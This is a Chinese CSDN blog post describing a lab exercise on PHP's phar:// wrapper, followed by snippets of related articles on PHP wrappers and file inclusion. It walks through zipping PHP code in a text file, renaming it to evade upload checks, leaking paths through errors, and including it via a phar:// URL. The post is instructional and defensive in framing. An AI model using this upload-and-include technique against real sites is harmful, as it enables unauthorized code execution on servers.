PHP封装伪协议之phar流

最新推荐文章于 2024-03-16 01:27:22 发布
最新推荐文章于 2024-03-16 01:27:22 发布
阅读量343 收藏
点赞数
文章标签: php 开发语言 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73720136/article/details/130551322
版权
该实验展示了如何通过PHP的phar流和zip压缩技术,绕过文件上传限制,将PHP代码嵌入压缩文件中并执行。首先创建并压缩PHP代码,然后上传至服务器,通过包含解析来执行隐藏的PHP脚本。此方法揭示了系统可能存在的安全风险,强调了对文件上传和包含操作的安全控制重要性。
摘要由CSDN通过智能技术生成

实验原理

PHP有很多内置URL风格的封装协议,这类协议与fopen(),copy(),file_exists(),filesize()等文件系统函数所提供的功能类似。
这类协议有:


利用phar流,先将将要执行的PHP代码写好文件名为test.txt,将test.txt进行zip压缩,压缩文件名为test.zip,上传文件绕过上传检测,再进行包含解析。

实验步骤

1、新建info.txt文件

2、对info.txt文件进行zip压缩
 

3、登录操作机,打开浏览器,在浏览器中访问http://ip/up/up.html

4、点击“选择文件”按钮,选中要上传的文件

5、点击“submit”按钮,上传info.zip文件

6、访问http://ip/include/include.php

7、访问http://ip/include/include.php?page=xxx.php,包含不存在的文件,使其报错,获取服务器的Web根目录、当前网页的路径、Web服务器等信息,从而得到上传脚本的绝对路径

8、访问http://ip/include/include.php?page=phar://C:/server/apache22/htdocs/up/upload/info.zip/info.txt或者http://ip/include/include.php?page=phar://…/up/upload/info.zip/info.txt
 

实验总结

通过本实验,利用PHP封装伪协议中的zip流,先将要执行的PHP代码写好文件名为test.txt,将test.txt进行zip压缩,压缩文件名为test.zip,绕过文件上传的限制,如果可以上传zip文件便直接上传,若不能便将test.zip重命名为test.jpg后再上传。使用phar流绝对路径和相对路径都可以。
对伪协议的用法总结如下:
 

韩无棣
关注
[代码审计篇]php代码审计之浅析Phar伪协议
qq_43668710的博客
04-15 1555
0x01 前言 简要说明 写这篇博客的目的只有两个 为**[代码审计篇]**中关于php反序列化漏洞的审计作铺垫 为上一篇博客做点漏洞原理的补充 环境工具 Win10 Phpstudy_pro Sublime_Text 3 注意(tips) PHAR的使用需要将php.ini设置phar.readonly设置为Off才能用于PHAR对象 PHAR 这个词是PHP和 Archive的组合词,基...
PHP伪协议详解
m0_67401228的博客
08-02 1452
phpexit();亦或者phpexit();?这样即使插入了一句话木马,在被使用的时候也无法被执行。这样的死亡exit通常存在于缓存、配置文件等等不允许用户直接访问的文件当中。
php伪协议phar
woshicainiao666的博客
02-19 1074
php伪协议---phar
php代码审计15.3之phar伪协议与反序列化
划水的小白白
07-15 844
1、基础 2、生成phar格式文件 3、例子 4、小试牛刀
文件包含之——phar伪协议
abc18964814133的博客
05-09 7124
文件上传之phar伪协议
PHP伪协议总结
最新发布
IAMAASTUDENT的博客
03-16 659
include()/require()/include_once()/require_once()参数可控的情况下,如导入为非.php文件,则仍按照php语法进行解析,这是include()函数所决定的。两者的唯一区别是 php://memory 总是把数据储存在内存中,而 php://temp 会在内存量达到预定义的限制后(默认是 2MB)存入临时文件中。压缩 phpinfo.txt 为 phpinfo.zip ,压缩包重命名为 phpinfo.jpg ,并上传。的 GET方法,以只读访问文件或资源。
PHP伪协议
qq_37466661的博客
08-06 6366
PHP伪协议
文件包含 (无视后缀)apache日志 远程文件包含 php封装伪协议
m0_64338210的博客
02-28 376
1.本地文件包含:(无视后缀) 2.远程文件包含 远程包含shellallow_url_include开启 访问: http://目标机ip/index.php?page=http://操作机ip/shell.txt 目标机: 操作机: 3.apache日志文件包含个体get.shell 修改文件 httpd.conf # CustomLog "logs/access.log" common去掉前面这个#号重启 apache 访问http;//127.0.0.1:8
关于Python、php伪协议等的100道题
02-24
4. PHP伪协议:理解file://、data://、phar://等伪协议的工作原理及使用场景。 5. 错误与异常:错误报告、异常处理机制。 6. 文件系统操作:文件读写、目录操作、文件上传下载。 7. 数据库交互:使用MySQLi或PDO进行...
php伪协议读取目录,PHP文件包含,文件读取的利用思路,以及配合伪协议的trick...
weixin_31178795的博客
03-28 1388
PHP的文件包含函数有两类,分三种:12file_get_contents()include()/include_once() require/require_once()第一种用于获取文件的数据,第二种用于包含并执行代码与读取文件两种功能php写文件的函数1file_put_contents()基本的思路就是用来写shell吧,不过会有各种限制,但是结合伪协议就可以简单绕过了file_get_...
php 伪协议
热门推荐
Ni9htMar3的博客
04-09 2万+
php 伪协议 php:// php://filter
php伪协议总结
h0ld1rs的博客
08-12 2849
文章目录file:// 协议条件:作用:说明用法php:// 协议条件作用:例子zip:// & bzip2:// & zlib:// 协议条件作用用法data:// 协议条件作用用法示例phar:// 协议用法 file:// 协议 条件: allow_url_fopen:off/on allow_url_include :off/on 作用: 用于访问本地文件系统,在CTF中通常用来读取本地文件的且不受allow_url_fopen与allow_url_include的影响。 inclu
关于php----phar伪协议phar文件反序列化漏洞利用
m0_62107966的博客
09-12 2206
关于php----phar伪协议phar文件反序列化漏洞利用pharphp archive)含义为php 归档文件。如果一个由多个文件构成的php应用程序,可以合并打包为一个文件夹,类似于javaweb项目里的jar文件的话,对于程序员来说是很方便的。在PHP5.3之后支持了类似Java的jar包,名为phar。用来将多个PHP文件打包为一个文件。要生成phar文件的话也是很方便,不需要借助额外的工具来创建或者使用,通过php脚本运行就自动在该脚本所在目录下自动创建。
php phar 中文路径,Phar - [ php中文手册 ] - 在线原生手册 - php中文网
weixin_34282558的博客
03-20 85
[#1]t dot habenreich at web dot de [2013-12-16 20:38:54]Hereisaverysimpleclasstobuildapharfilefromagivensourcedirectory.Youcanusethisforyourownprojectandsimpledeployment.But...
php伪协议
weixin_60719780的博客
01-27 5481
PHP伪协议,也是php支持的协议和封装协议。file:// 访问本地文件系统php:// 访问各个输入/输出data:// 数据zip:// 压缩 不过有些伪协议需要allow_url_fopen和allow_url_include的支持。allow_url_fopen On/Off 允许或禁止打开URL文件allow_url_include On/Off 允许或禁止引用URL文件。
php文件上传+文件包含(phar伪协议)
WFC1006848997的博客
11-22 5832
test.bugku-web-upload—文件上传与文件包含组合 右键查看源码发现 继续查看源码,提示参数是file,还有一个upload.php 跟进upload.php,是个上传界面 那就可以猜测出是 文件上传与文件包含的组合,所以直接先使用伪协议查看源码,使用的是php://filter协议 php://filter/convert.base64-encode/resource= 首先读取include.php的源码 发现后缀多了一个.php,所以就不加.php了 base64解码 &l
php phar教程,Phar:PHP文件存档
weixin_30476083的博客
03-21 266
Phar:PHP文件归档1. Phar简介PharPHP Archive缩写,将php文件归档到一个文件包。将一个模块的文件打包成一个phar,这样方便模块整体迁移,只需将phar文件移动过去,其他环境中include即可使用。类似于java的 .jar 文件。php 5.3时,为php的C语言扩展,安装php时会默认安装。在安装目录 bin下面有phar文件,通过 php -m 查看php扩...
伪协议filter_代码审计php伪协议利用
weixin_39613089的博客
01-13 816
“作者:小刚一位苦于信息安全的萌新小白帽,记得本实验仅用于信息防御教学,切勿用于它用途”什么是伪协议PHP 带有很多内置URL 风格的封装协议,可用于类似 fopen()、 copy()、 file_exists() 和 filesize() 的文件系统函数。file://访问本地文件系统http://访问 HTTP(s) 网址ftp://访问 FTP(s) URLsphp://访...
phar://伪协议
02-28
phar://伪协议PHP中的一个特殊协议,用于访问和操作PHP归档文件(.phar文件)。.phar文件是一种将多个PHP文件打包成单个可执行文件的方式,类似于Java中的JAR文件或Python中的ZIP文件。 通过phar://伪协议,可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值